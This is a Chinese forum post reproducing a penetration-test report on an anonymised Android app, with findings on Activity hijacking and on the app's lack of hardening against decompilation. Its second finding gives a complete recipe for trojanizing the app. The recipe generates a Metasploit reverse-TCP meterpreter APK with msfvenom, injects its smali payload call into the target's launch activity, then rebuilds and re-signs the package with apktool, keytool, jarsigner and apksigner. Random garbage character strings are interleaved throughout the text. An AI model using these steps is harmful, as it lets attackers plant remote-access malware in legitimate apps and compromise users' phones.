原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

- }! s$ H# v9 m6 q1 h& k1 }$ W7 n: s3 u6 {+ o1 h4 ~0 ]* M; o9 A# C1 Q
4 t# L5 v/ h* @+ e, q* G 4 H' R- k: ]) j6 w3 O5 x

" Y% P; h/ m) {% o/ n& }. y ) _" q8 |, D% l Y( [ 文档编号： ) s1 k- P) g7 Q% Q5 C9 o7 ] ; J9 t/ k I( \9 m1 w

& w7 b9 I5 O" L- I+ M1 S+ [1 x( q8 i1 n- d 9 b- ^$ ~3 L4 M( D! C7 _- c ( }7 v, V8 V! q, T2 S

& P% F1 [/ P7 _. x# i; n7 c * B# v4 ~) I a W$ \5 L7 j3 n ( t" P# n: d+ b" d' t% e 2 M" ^0 g E) \

- R4 ?) a! U7 C s* J, Q9 Z# @; m }5 |, y " g) e8 l& I6 ~$ Q& T! t+ m! m3 w8 j; A- k; T

1 Q; l" G; l( G* K5 K- u% \3 [& U# R2 |# T6 X, Q2 @# g $ H* O2 \# T# s! g# u T9 l ! g- N8 S( v, R

- P/ V8 V1 `6 m9 ^5 L9 p) a4 C; I 7 A/ j5 Y% J% z1 @8 A. s$ K 3 v6 k3 i B4 A* B- O6 Y 3 c& O! t% [1 y/ m+ Z; P. f

2 f" n3 G, y) u9 [- K0 l/ }9 Q: o5 V6 a1 A 某某某APP渗透测试 + n9 b* F+ p6 C2 K/ r1 j1 B4 C 3 f# u3 G1 X7 {* d- [1 A# r

5 G( r C6 o6 R/ Y1 ]. F) P( k/ G, }1 A" {4 S$ ?! V 7 P9 U1 r3 j1 t- T2 _! Q3 [ * c1 t& Z9 p. ?9 ]# A D

6 E h) S5 m x& s 4 W: _" t' Z, M# V, ~ . _4 d# z! `% A1 `" ~& Q 9 Q8 A9 [7 \% [

( }/ q8 F% B- v! n" l + _) d' D! ?4 i3 \& }4 B " W- H/ D' K; V# J 8 k/ v4 J8 S5 [$ G, P

$ f4 f2 J+ q: `- r: u& v# Y7 {; [8 Y% }- h! ?2 S, V2 R : K+ y. G2 G3 J, t / k, A& x7 }" q- g. N

. e0 J- G) `/ }9 q: U* I $ r* _0 G1 q; F; h O, X2 L 技术报告 ' r2 s! t5 [3 }6 K , o0 ^! p' F5 U, e

8 E9 c* C- m8 g4 M0 X+ h ) v# G4 o8 f; k1 Q7 n7 x 2 s5 t, T \4 I, f4 a: C: D0 a. `8 U) e P

+ H/ r2 S7 P$ v A5 q. P$ f1 w. b : s x0 y2 C* l7 P. m" D, b - {$ t6 c( z, z% y% o

; i5 _$ [; E' } + E; X9 c @1 E % P+ \4 I" g/ j5 ^8 ]4 v3 |7 \6 T& i# I: w

/ P) U, W y; ~; g9 S' |( n. E* A( y K& U$ F2 r" r- a6 n & \. Z4 K# Z8 W3 y' { 3 Z: B8 s$ r5 D3 X2 d4 n

2 U3 q% x) N5 ~* a3 p# }/ R7 v . x& R9 i' T- z- _- M& x 9 H& e& ~) V T8 y5 D" a, |. [* K$ [2 b' w" X+ c

2 ]/ W) D% _- d& }& g a" C! }9 U) ?1 k4 C8 B1 }0 X ; o! R# x: s8 T# z9 |1 s8 _. H 6 N1 t" L5 Z" Y( y

0 } g; q! r) V, _" z : B; a" f9 C, f5 i . _+ |- ]) X$ g1 d& \/ h% z" h0 N5 J0 n% F

3 G& ~8 E' Q8 N! m ( W; y; l! E/ j P7 @2 ^1 `* V & G2 F5 J- D& ]8 m: H1 I* N2 a7 I0 X$ j5 }

- q* C& x, g6 ~0 V) } ! f6 `4 m+ k* U/ g$ g% C- V- u . h# |& f/ K. [ ) O9 Z I9 T5 l+ P; }$ _) ~: p) r

0 T- U6 `$ S5 z, `$ t8 j0 ` 6 V" X9 h! j% n# m s7 M5 i" ^% L, f7 }/ W * o' a* h- _5 B

( N. `) X+ E/ j, i ; Q4 ?, s$ r, I4 j 2 z8 t7 M5 P2 N! K9 Z9 R4 r# _ ' h1 l& X" t9 `3 `: h4 s

# t3 B1 U. p! U! L# } " k" y G8 s/ _2 r 1 S; n) L% I, N6 U; U( G1 U& q 4 \2 Z' r/ ?* V5 l

# W! |+ l& O$ @: z' G& f , G% n3 s5 }' _# _4 d; c/ B; | : e' c- A8 J7 { 2 q; s2 A5 j! H

9 n# o" m) |7 P3 | " e" S ^9 D' J * j9 @; s) R8 u# N ; i. Q! T3 |4 ~) J6 E; c4 s

( \, Y, S4 z) ?4 k% ` h! U9 K 8 X m* H7 Y: ^ t7 U5 D3 Y 1 }' Y' S) ~8 m/ _$ _6 |1 t6 `# ?5 _) g! I" f( w, Q; Z; w

$ _; a" H( [5 N( S+ I 6 N. [, Q" v4 p1 O $ b$ R7 l4 k9 ^1 y. ~6 Z* L! u$ L) Z- l4 H1 S4 W* v) \2 f# y

. V0 J+ N) w) p7 b3 ?! Q. A; ^ 1 j. G9 B" W3 J$ R3 E$ v" w ! K& F+ g5 F/ C' V7 b0 { k" h5 _( z& Q

. m$ [) o% H* I6 G / o0 y7 y r, r! E3 X: Q , G, I* A" |9 D( \9 E [ 9 O) V- t6 W8 s" s2 k

5 d; C, L4 z8 t4 G ( ]+ B% l: ~& B. \# g2 |) a" m 二〇二〇年 6 n4 R4 r/ @. |2 F# v% n ; H( f8 Z! R" d' d

- v6 }( N% O4 Z* G, m " M! y% ?' W* o 目录 ) S, S& `2 f9 P; u7 }0 v2 r 0 S6 G H/ P; r7 P

. Z v6 e7 Q' `: E3 I " ?/ B$ F3 u! s; {+ g 1 @" m! z+ l5 s6 k& J( V; w * E0 f9 q: g, T( o8 ]

% j" O- l0 G+ d 8 f- Q; d$ y6 s: ?. i 1 概述... 3 8 t& ~3 A# c. I. F! N4 R ; y) J% p9 S+ U) @+ j; ?6 z

7 f. r" g$ t" M0 { H$ b6 \; o! c7 W, k8 i2 }) r9 a# y 1.2测试时间... 3 2 @( L3 n. m O5 C. @# F$ v7 l* f9 V8 b6 k7 `6 Q- l7 _. D

7 j' Z# t* o( z0 d6 E 6 J5 u+ f1 _! Z- l1 Z1 }, @ 1.3测试对象... 3 . i4 \% k& K2 ?) t) Z 4 c% @9 |+ }( J/ T( Q

7 a, @, M9 k* \4 Z& g* T7 r% i. L . a1 e, Q4 \2 ?8 I3 U 1.4测试结果... 3 & Z1 G0 k: @0 X8 O- _! O # m7 O* ~- D0 w' s( E

4 d# D0 q0 ^, ^/ v ; Z8 e# {) [7 P. N3 \ 2 检测结果... 4 ' n8 G4 M2 v2 ?* F8 e- @# S4 V& j. A9 J

+ t2 {) [5 C; w; K9 j1 u O% {: B6 P# J8 ` 2.1 某某某... 4 / |& _6 u' \: {0 v2 P& K+ h 1 g9 U0 M3 ?! Q) O& O

4 f: { Q# C: i6 H v # H: c' V! |) N# E' S! l 2.1.1检测目标... 4 z2 h8 E: x2 f7 K% e+ J " S& U( y' d& d, k

" o9 U( Q" y( L4 B$ o0 J3 b' N 5 x# u3 n: W: S, Y 2.1.2检测结果... 4 + v% N- Z5 M% H, | " H4 O4 A- @8 r. H% }8 B$ j2 q

3 t3 \/ a" d; U- z: Q% Q/ { & p# A. \5 H! P4 K3 J( O( ^( L1 D 2.1.2.1. 4 7 P7 t7 D# e) ?& Q( j0 r7 x0 m2 D! u( p' Y0 ]

3 P$ P8 O o! ?) u: ? . {1 q+ b$ X: p1 g9 [5 l 2.1.2.2. 6 * U+ j! _! Q6 M: H0 O* n . C0 t- x# o! {

/ f! L+ f/ u& E4 k+ N, X; U * ~/ d# s8 P5 r, t . `( w; V9 V( t' }; x2 g# R1 u, h; l

, W7 n8 R0 Z; n! O$ ^6 U 1 K+ j# M& b+ ^+ S8 c 1 概述 ) a1 \: D" n1 e L& @5 A0 Q4 e+ H* k: R* ?; F/ g

7 F" a( |1 {$ L7 x$ D , Y" L9 b" [8 t+ o 1.2测试时间 2 L4 Q, L" i9 q3 r. s6 |$ B$ _9 q1 U( c6 p/ S

+ e }0 V6 f& j% l; O" D) O; G 4 r5 A7 P! h& o' c( t0 ]8 ^* U6 V 8 x0 ]. G9 t5 S / g5 l. O/ a; M4 \|+ {0 q 渗透测试时间 # X7 ~5 ~, a$ x) c" F * D3 m$ ^1 B ?, v ( u( J( p. F+ j( p k5 `. x $ ]9 D7 \6 d9 X) H- P
7 C; j0 }. B/ v: N9 I" y8 S0 c! @ 2 m5 o; G& a! g' F4 p2 n4 ` & H' B, v! g' ]5 f; b4 F) Y2 U) ]# z S l. Y+ {1 C0 X1 k- b: _ 起始时间 + T9 `8 d5 t6 p2 [ 3 R6 q3 {6 Y" Q; W; C! C/ D7 a 1 B/ j5 ^2 z5 N% Z' b8 W$ R9 u, Y % Z9 [ ^0 G& @. K, L	# K) D! y: g$ q. [! x) l 7 k8 K8 i( A# v- V# J0 K+ b# ^/ } 7 }7 E$ y; l' ?& R4 } K+ g' R- R% ~7 _1 m+ J 4 G# _1 S) i" v8 v1 x8 ` 2020年4月6日 1 @* k9 G) ?1 L/ K3 V( Z1 F2 _ e# Z4 h, L. \|- v5 ^* M1 }; k( R 9 T2 ]; ]1 ]. u. ]7 _ 8 b9 q$ [6 P8 k4 k( c, h! ~! N
$ i$ B3 @$ w, v7 ?, O, c3 m* J: c0 j0 n4 o 2 n; N& S x5 {5 j: c9 o # h& ^$ `9 H9 f) r$ H 结束时间 0 T$ r0 j& ~% G9 C4 ?: a 7 }+ y9 w4 L S6 i+ G ( L/ j' `- v* G' `) o4 V 0 Q8 \, Q$ P9 {1 G/ r L; c) z6 w( Q	& ? y2 }1 R' P$ O* W# p) T * ^5 D* k" j: E$ l; G; [* M% I / t. ~7 G! y! t- j# w- T* L' x) e% v 2020年4月9日 : V5 U- L: I e2 H. f6 ^ , h* o5 {- O ]! [( O 9 v. E' p3 U* i5 J 6 l" H- E. P# V+ h

. T0 G' h: G. a1 U7 } Y ( `4 j$ b# j7 o8 \2 [- p5 x 1.3测试对象 / `/ A0 D' e4 m, j* a* D X . S- J- w. ^# Z9 N; o/ V) E

" n4 T1 R! q7 O 0 J& n8 d% q! _/ Z# l. ]7 | 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ; u) C! f, ?+ `( O- Y5 o. B$ W4 i ( s1 e0 ~6 T9 t: A3 s, i) a

3 t$ K& ?' I# Z7 d0 F4 ] a( t5 G4 n; R+ R 表1-1 检测对象 ! e# E$ s4 N5 r9 X9 r9 k$ c) `7 Q, C5 Y+ I2 a

3 I0 J, w+ C$ H u % J( I- V0 u: ] * t! P* I2 J; s, \; ~% i J0 P/ e+ h) t! c2 W# L- n- ^ 序号 / o5 y& u" H% c 3 H4 I" _; U3 [* o7 ]3 H' K; ^5 t * x' u0 u! ]; t5 Q' H3 R9 v 6 ^3 @" w; Y! F: {/ r* c( a	8 `$ t# R* R8 N 6 V i! B6 A$ \6 o( \% j6 A 5 N0 ?' h. f' k( C1 x+ h- i 1 e" d9 c, Q' r4 d 测试对象 5 e- C( N+ \|: M7 O; _ \|9 {' v & E u7 w9 L# T& ]2 T7 U0 j) Z ! F) Z5 s4 m# g* F6 M 2 z( o5 I( n( \: `, x	& `4 K* _; ?7 N6 E, m; O* ]& N , C. G. ], {; D/ S+ { " l6 A% \8 e' X8 r( e& u : _8 L, c' z" p. ^: S* x 测试地址 0 g0 s( m7 M% @9 r8 `* V) W 6 ^* y$ V- i1 m# [- k 2 D" v& d# d( {2 K: G ; V0 `6 J8 h, k	' s/ _3 B7 _, s1 G5 i1 ^7 f . T( v' H/ u5 f' H) i 9 G7 l( @1 O" l8 \|, k/ c3 c0 @- N8 G+ F 安全漏洞 " R0 y0 b1 P% u2 y 0 W/ l3 o5 C+ V) M1 N' h! D( C 5 J7 V+ x& o, ^: s% ]0 g9 z - Y5 g- y% w& K3 s) S
. r% O4 S3 ~. J, q1 }# e6 z8 Z+ \| 2 }! A0 l! i5 H+ w 9 X( s" O2 _( p, Z+ J 3 V) U ~" s3 \|3 P* J3 u 1 * d) {+ O2 ~; g" U. ~; X $ d4 \|9 {( Q* ]1 c$ c) P- V ' p$ p" {" i7 e4 x" \ ( ?9 @7 e2 `# H3 J+ \|, W4 R	; C3 a) t8 k/ J3 a. g + L$ ~! G+ s2 J F6 d* H ( E7 h$ V7 a2 h, N8 M6 H0 F/ [+ B) G0 w( K3 r 某某某安卓APP 6 l% O6 f8 f" X( T. q$ z/ ^! E N7 k ' p$ H6 K- y* N& H. Y: I2 B& G% ]. ~# c6 c8 t% z! E	* @, B% e- C$ H/ L& ^ / _5 W) u) j4 V l; Q# S 8 ~) _. i0 ~9 R0 I 0 W; x' n5 n2 [8 ^+ q* \2 y7 X5 o 9 ?8 Q5 K7 ?& [, s5 C, x2 i( k ! n/ k0 v, Y/ f* c# [% b! C4 T$ I 0 @5 S1 F6 F5 {% D+ R+ L! }+ R! t9 f! c# x! s, N" s* }1 P	; W; Q; J; q4 _5 y, \5 [; D0 F5 A, }: m3 f0 Y, E. ] 5 s* g5 E6 G8 z$ f7 A% a! T6 @- j! X 2 + _6 n9 ` w R ~# O$ S, B, G. [: p- Y$ g ' u; f" [3 v% D4 p9 W3 ? }/ L( }- L3 z% E$ c3 [) N

; _) Y" ~6 P8 c ) P0 y( Q3 r8 v% A# @ 1.4测试结果 6 b4 }0 y9 R7 q) \! K % p$ k9 K$ N% W+ f# h6 x. T" G

; i3 n7 D$ H p, b 1 E- K0 {5 H n% i 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 1 D: }# j2 i$ J$ c5 G2 i4 [ $ g# d9 b% s* y7 U9 F

! d O2 ?# q! ^; J% W* m* J- i9 c! c3 K; T. D4 Z5 c0 ~1 Z ! o9 X# M9 p$ ~2 H( d' P9 w9 X $ r( M) @2 |. f7 d

% b" e1 l4 ?3 n, @; | 8 E+ f, ]8 C/ F* O 序号 / Z: v7 ?: f! s4 j3 ~: h7 Y " z% U ?/ e, K' P: B1 [) G

8 J- O: n. |0 ?8 P4 n 3 Y' c; w1 Z8 {9 p& S4 U8 V 系统名称 ! q9 n# p2 ^: v" z& m $ J* Y' I- F! \0 C8 A' k/ m

; t$ E& o- ^) I" ~6 j, f$ K/ V+ W% q7 j; E0 h! K: y5 K 漏洞名称 2 U/ O! m' Y( e* c, a1 g, N+ E 9 {: M6 H4 G) m. q3 |& N, N4 b* r2 {

9 J$ x/ Z B/ w6 j , N9 |& _) D; P' U 漏洞危害 4 Z( N/ M) ?3 t3 P" }( R- E9 ?! f

1 _* t8 L, Y- i, B9 G v: k" Z1 ~/ c; ~" @ 修复结果 . ]) k. V6 x% e8 k! _ % e3 c+ |1 i$ J5 Y# U/ z7 {2 M

/ T- y" \( ~$ M' K) r1 t # w' A; Q% i1 g9 e 1 1 u" G& a, H9 T5 I 1 J. o# ~1 O7 }' S" z

: M- v4 y K& Y3 O" e1 t 6 S: @5 a0 d6 D# ?) D% m 某某某某某某APP 5 l. h# S* w+ U- S1 }8 c ( e9 s9 F# B8 [) E

0 C7 p( x; G, u8 r% P% q2 m2 ^4 H C) v1 b6 X+ j Activity 劫持 : s" Y5 s X- l+ {0 R* L 6 L- u! _7 T* T3 o' ^

1 a5 U$ |4 U8 n+ n3 h8 E8 y7 t% M7 f9 Y 1 _ c$ Z+ A- S% M2 K : H% N% V9 O; K& `$ v

. O9 f7 u3 o/ o5 n; c5 p0 }6 W/ G, C3 h- Z/ p0 |! c! X 高 / R# N! U4 {* i" Q1 w7 c 6 Y& \4 J5 t# [& @+ T: f4 u

, q( w r% o! `4 ]! m, z% U6 K4 U7 q4 t `* l / ?" l6 N9 D2 G, v" e4 y 1 h/ A/ K. j, t9 d! @3 }

- k; G' b/ g1 n# A # A# M7 P' w7 I7 w. ]) z8 ` 2 ' r' j6 g. I* Y& K, o+ Q4 `% t! q; e3 f/ R 8 |0 U1 r8 d8 d9 h% W/ S9 H

8 O) o1 u- E, y& w, F6 d ) ] Z0 p0 n# a) C4 S: V 某某某某某某APP r7 p& _ q& F4 Z, t& s, G4 E1 {5 I8 s! Z c Y2 ^

6 a; z& G! s/ L+ f 1 i, D! \9 v' Z2 D+ K% O 反编译二次打包捆绑木马、篡改APP代码 " r1 t5 \; l8 E: n6 j" A6 V7 R . L9 x& M- V E

: J7 I2 ]4 u# T+ ^ ( W% h- e1 A' e$ Z' [ 高 m3 z$ ]& ]- }, G' F + _; R: ~! S- R r

' P! ^2 k4 o+ P ) F2 \) o1 w, b9 v9 L3 d' j # a/ W4 ]1 y0 p x0 l% [; G8 ]+ h2 I6 L9 Z3 c+ _6 r* a: c

' K0 i+ X) k) O1 @$ ] 8 x# @) ^: n& A- `; Z1 u3 s3 _ 3 t) u* q |% s$ y* @ . x$ P% x3 w+ w2 F0 s& P, f( g

, H- G. ]; Q4 ?1 a+ Q% A1 V ! q2 ^. [: K# F6 |6 Z 表1-2 测试结果 . E. {2 Z' B3 d, v7 y 2 s- M8 b1 r, N+ s- ]* I5 f) `

& t4 w! F+ S- r: [" X8 l! v+ p 9 B! p; j7 B1 q2 ~2 u; M6 V 8 _% G" {" z: C6 a) I , x% l a# M4 g

% F+ ]. q9 e' M3 H/ p |- e& M# V ; }1 t/ q* k" U* I: Y' `6 I 2 检测结果 7 ~' f; n0 ~% b. r4 w) h 6 b8 @# s5 h, g5 l; f# b! k

4 |/ X" H3 C+ p) `; ` L4 Y. }* w; ]' \ 2.1 某某某 % n: H6 }2 N( s, n) V " z" \6 _! F- `! t+ R! [

" Y8 d5 M+ K! V5 {# M! x4 n. a: `* P o' ~4 e6 ? \ 2.1.1检测目标 6 d& Y4 a3 ~- G: G ) @6 c9 \4 Q5 P8 A5 |4 \) X' h: C f

1 M2 z. Q s7 J/ C- N; L: A # P% l3 F% o+ @" L+ [ 目标地址： 某某某某某某APP 1 h+ y9 L. t- `, `) i0 S, o$ K7 t + i! Y6 ]4 Z$ u1 d! H" d

1 i! ]# e1 S0 W e, h* @ ! J& [( ^2 x- q# l0 @ 2.1.2检测结果 5 D2 t+ @ G" }* c# D' a% Y8 T* G" N* h+ m0 u6 L+ J# m9 D; W1 ~$ e

- B4 N7 J. [% h" a Y1 ~ % T$ o' l5 Z6 [ 2.1.2.1 " L7 t* e+ ?, m+ K) N k- M 2 e2 k1 s# r6 o& t

' Q) Q! L7 e- f) p 6 t! q4 J5 X# `2 v+ c/ S; X 漏洞链接地址：某某某某某某APP / R1 w l! C1 ?: a& l 9 Z' \" B4 ^* Y+ {/ o( S- _

' l# q7 j4 g8 a' W) V. v* v8 a; D! E& u ' f* H- z3 `3 H1 D' q & t" Q+ T/ a; W, n4 Q* t

% J! v: y7 a I7 {$ q+ Z2 \3 B: A. N 漏洞分析及取证： 6 Z: |* G" v$ [$ v; f+ J. o7 w, ?+ O h0 G1 U1 u% y: A

& V' E, `9 @3 L- }; G/ | # U; s$ P; N0 i$ [; S" a' l- k 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： ! B' j& ^0 E# a3 [$ B4 g ' y6 f/ j* ~7 B" B1 d

3 _2 Y# Y. O( m: Y. y& J3 v1 l) c0 n5 r7 J0 u% ]9 _ . c+ g2 G2 r3 G- M1 g : G9 Z. ], o- y i! K2 |

1 L' k5 i m4 L# Q, U& N# p6 L. ` $ f8 S. E. O3 ]0 g, L ?! o5 O+ D* ?, |/ U8 S. I' @! }' P, b$ h7 L5 L7 y T% H5 }- {4 ?0 `

8 O# t" p. ^( r0 ]0 B7 k6 k0 p 5 F- |: P% Z& b3 t# X$ { t5 k : v! E( S1 M8 j7 f . W& W; \3 s9 L! N# Y

$ D ]/ T! I9 X+ y- |/ S5 Z0 a5 u3 V8 w8 N' \3 k/ h' c + C3 Y+ G7 J9 O" O . z$ q3 m8 [. }+ R

! L; p# S$ e* [3 H7 A% F1 g 7 R% ?# p$ P7 t6 f) z! C0 f7 O5 n; w# M - [$ @# u, L2 \' l 7 o, ?" U# ?( w+ [6 i9 o

. x& W0 k, @+ C+ B8 Q + Z: X1 N" N+ X+ W3 ?' V/ j 漏洞危害：高 - F- R% O. [7 X; F! `6 x; L6 H) h. u5 D: n* d. s2 j

* W4 c% Q) ^0 H1 R5 g/ P; T/ L9 L4 C9 j% d# Q 3 ]- K6 `7 s1 J ] " \| G+ k, S( O2 x: ?6 [ 严重程度 * c/ }* \|0 f5 V9 q : F; ^- \|4 M9 u8 V9 D8 k. s 9 p( b# r0 o: g( w3 N* A! S& n$ B" S5 r9 s- m6 J	' N! @" \! \|) m& P ! k+ } z/ l7 P( T% n # Y3 V2 {5 Z' s8 n6 s # F1 Z, H: t& b1 L 高 / S4 M7 u/ a- p: J4 m p$ @ , B7 B2 [6 v O9 m# K# x3 B7 v " _+ O5 t' y0 f; T$ J, P6 G3 S3 d4 u1 D6 U: V	1 m. y- M4 \7 { S& e. y2 G- V+ C / u+ Q7 s) ~# y5 M# h / A9 r% q6 g+ H4 s* Z: D6 G6 m ■ ' y9 h# [" }; `) i 1 `5 J( i! M$ S/ z7 O # V$ T. \1 q k0 }: n( n, }! p& R H/ P	! U A! X' z; y' x' w- h% b9 e7 }2 [ . j, N1 T3 _/ \|% p- { / ~, q8 ^$ E7 \|- ~, e1 [1 k 中 * h! t. B3 {/ w1 V2 I; z, o / x& Y) D0 X; U# O M# O$ _ : j, j: O( Z3 Q8 B. y$ r3 b' T" c$ e ^+ i	: F, Z9 s3 @- B$ {; A3 t6 p( Y6 W x) B) E ]& P8 i ' C4 [* ?+ Y( ?$ ]) y# i8 Z3 i2 A3 G2 T * u; h7 C8 ^) R" A* N + `8 {6 L& h% e$ i* i ! g7 v$ b( E/ f, b" R " Z8 Z4 L w' Q' E	: x; a3 \' Z7 f5 z / C2 A* g. u* B; e1 d+ x% I& G9 w6 X / f/ T# ?! }9 U$ h7 w. T 4 J7 Y) M) r* E9 U" i9 A2 r3 M 低 / X$ O- I$ O- \|5 i2 l. D7 F8 s 4 g% b4 q* n/ I( x ) \) ?2 t: q8 z7 l1 u- [) V : N* E" l2 R4 P: ^	$ T! V% B# G8 }9 M3 F( f4 a+ a9 s% S1 ]" H. p& D4 E 5 ^: t/ _5 S3 \|; H. R" \|+ x4 B$ }2 M 5 H8 `: u3 K- Y 5 u( y" e: J/ _2 l / p4 J+ Z* [/ L + f E* W% y8 u& Z/ W& s# j# k# R/ z: b

3 ^0 o7 b/ b9 k4 ?! S' d7 a0 x& Z8 j! j8 q; a + s4 T4 P# u. o/ S4 h% t* s: F3 F- r- [4 I9 O7 {$ Z9 k

+ h: t& y1 D6 A: d * K# R# q, B1 E' _! x 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 / e3 [% \4 M( d/ M 8 y) z4 x" J1 [ [2 P: H, h a. ^

! s! `6 F7 ~0 X, t/ R9 E4 K: o1 W- A# B 2 O2 O4 \" D& _3 x0 K1 x. g- { d 3 ]! l2 S v+ o& X. o4 _

* B/ E. L( b3 {3 m $ P, X& T2 ^! c$ b) O ' h% A" P# O% [4 `8 k % v) k/ X# O1 t G; F

& |- O p1 ~" A+ T# x# v$ W+ h : O9 c7 k( f. F/ n 2.1.2.2 7 |8 `! }( G4 x# x5 }3 m ; c7 y- m; [( `$ M

& J: r/ E: F3 C+ h: C6 ] n# U2 ` 漏洞链接地址：某某某某某某APP ) U) f7 N2 E# s( N3 s 3 M' [4 r, V6 j4 `

& L2 ^2 O, _( r7 {$ g3 p 5 H6 J1 G( [. W* T 漏洞分析及取证： ' W/ y( M* U$ D . s5 B$ J8 K( u1 h1 A

( z0 k5 _, w; u5 T) ]3 w0 o* T- M9 j7 L1 Z; S Q 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 0 u7 C2 f$ ~/ F* w3 G6 h. d7 g- L

5 {1 y* L- Y) c: s" ~, z ' Z& {3 _% E+ J& r+ l2 X 用Metasploit 生成木马 apk 1 e5 T9 p, G) H F5 _" H6 d) J3 F5 p w& o0 P! R6 m

# f3 x, d: v [$ ^. N' f8 l: F- r! N msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 6 J- m' f0 q$ W& n: T ' s! Q) d# ?5 P" B2 u, g$ k9 a

7 d7 x; ]9 W( \- { ! U% `8 v2 H# c' J. I9 H 反编译目标apk和木马apk 3 |- V8 a: ^; x- Y/ t! U! w+ V 6 T/ e" a# `& [

: `0 u3 O. Y7 A7 `+ K$ r; e# J0 _! n2 l' S6 W: G7 U apktool d target.apk
7 ^( A* b; R- O r6 x 6 a: u/ [* _3 W& g$ q' u' T apktool d cockhorse.apk % N4 m. C8 K+ u 4 w5 s6 u% F0 K

( I! A4 E7 m5 F& T! j / F1 d# j# }, j' X* r8 y 木马 apk 注入目标 apk 1 t, ]* P4 v/ o/ A [4 t+ k6 R) Z1 M C: H4 {( i- P

- M, F4 m/ e5 u$ A( @7 B$ u& J/ }/ ~9 m8 B& a) v 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
% J. `$ A% r9 w0 O 2 J9 D# }; w5 a: Z1 E invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ; B/ ~! l& j9 R* K7 V) e/ i , l! Y) {9 ^' I/ v8 U4 Y

" a8 \. V/ h& b% K7 Z8 I ) v( \2 Y% {6 {1 { 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 2 t( n* U1 | H- ?+ x- W . o3 z' m! i. E$ j6 m6 m+ ]

# e) {0 C: q; v7 P! V- f6 [- b* }3 m6 F6 h( C9 ~* ` G8 ]! m 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 9 c- V, J6 S$ m $ s2 x6 T5 a9 J' v) ]

: t" c9 u. V: a- I- q4 Z7 w$ U 5 L; G" q; l( x3 x2 C3 s 回编译生成最终 apk 9 o2 {( k* X+ D$ n1 [+ E0 i ' @9 I2 z3 n# a1 v/ L

- v# x) l- z" u6 k0 T( ` 4 ~% D# f* o* j; M" h: R 重新打包 $ f+ j4 `! D1 }0 W! l& ^ ) h* ?# i9 d3 a$ j7 r2 b

[1 `' ^* P5 U6 Y6 \, `! N0 j3 ^ & N m, s. Y$ T8 ] apktool b -o repackage.apk target_app_floder ' T! _6 J- T! ~9 H8 C I% s' m7 ]/ A' z2 K" s+ W) W0 ]

. J9 A& O/ L6 M & c; \4 z3 d5 u7 t; [; } 创建签名文件，有的话可忽略此步骤 + Z. R! U/ C$ r) [. D& N . _: @* ?: c) k

+ W# ?$ I. N5 `# E0 F* t1 a6 B3 r* M! k6 q( O keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ( v2 h3 [0 A! T2 v4 g) ?# A / J I! f& u8 ]9 s) \! |

+ J0 z7 n! Y2 P+ f# F! y. M/ \4 P/ X' a' e 签名，以下任选其一 0 P# ^" n8 Z, G6 I% X , b: `! p, a7 u1 [( U

( l+ l8 u( R6 S2 g # j W+ E' Q+ N5 x% l, I; X/ @/ s jarsigner 方式 4 ?4 f+ H2 J/ y% x/ O; ~ O: n , m, e& {9 V" m

& N4 _4 n5 q' [6 T1 y# Z + O( [9 e! ?5 R" V7 n; @" j7 Q jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 U( y5 U& T3 I8 C4 Z R6 B4 r& x1 K1 s/ I3 ~

9 d7 f5 J$ V% _; c / G- q8 c- k& y& W+ G6 g1 A apksigner 方式 . D/ `; M& E# V2 c# @4 Q5 i9 u! J5 M( r1 w

/ O% q! {8 e( z& S# \' {0 ^/ l5 h$ V0 {9 g; j. y1 H apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ' C1 Y( u1 B5 D/ } , r( \3 d ~: v1 B

. a& T, x$ @( N' w' I1 p6 A; F% ] * p) G9 n1 t' f8 z; S9 d+ c 如需要禁用 v2签名 添加选项--v2-signing-enabled false # M. P1 G% ~% r Q4 M5 _ % K j5 j- ~" U4 G

( i' {4 P+ H! A- y3 U " z& N3 W `4 H& @1 g/ q7 U4 B* ` 验证，以下任选其一 ; S i; m2 x8 U8 T4 ]2 L4 _; g9 t+ }) X( W' ` B

6 T4 ~) e) p9 D+ d: Z: E" ? 8 F/ f- D2 s1 L( o, j jarsigner方式 5 b9 z. f6 k# [, @) a : t T6 O8 f5 V. x y5 d0 A( y

* Q' w( m$ y) n 3 ^/ U! X& @; @" n& y jarsigner -verify repackaged.apk ( I; i, ]5 j0 V, G9 B; _8 } ! R9 z7 j9 S5 |+ n1 U+ m* V

4 p6 A" V4 |3 \ 7 s3 b7 [ C7 v/ d6 u* z8 x5 L0 ~ apksigner 方式 % B2 {5 q/ k6 R, f! {" Y% B# u * c2 ~( T% [+ ~0 ?' M6 {) V

/ V5 ?" ?4 g- X# R; v( X3 j 7 p, i- g( j+ O, D apksigner verify -v --print-certs repackaged.apk - R/ I/ Y3 c$ P ~; X8 e ' `6 ]& Y& G9 h/ s

2 o& I5 U6 j2 s, n/ ~7 w& O, [9 N9 ~+ D4 c1 ?' w% A1 b9 p( {6 k keytool方式 ' K2 q3 ~+ b9 ]6 N- T) ~) Z/ q# [, k$ n* b, H) t0 e

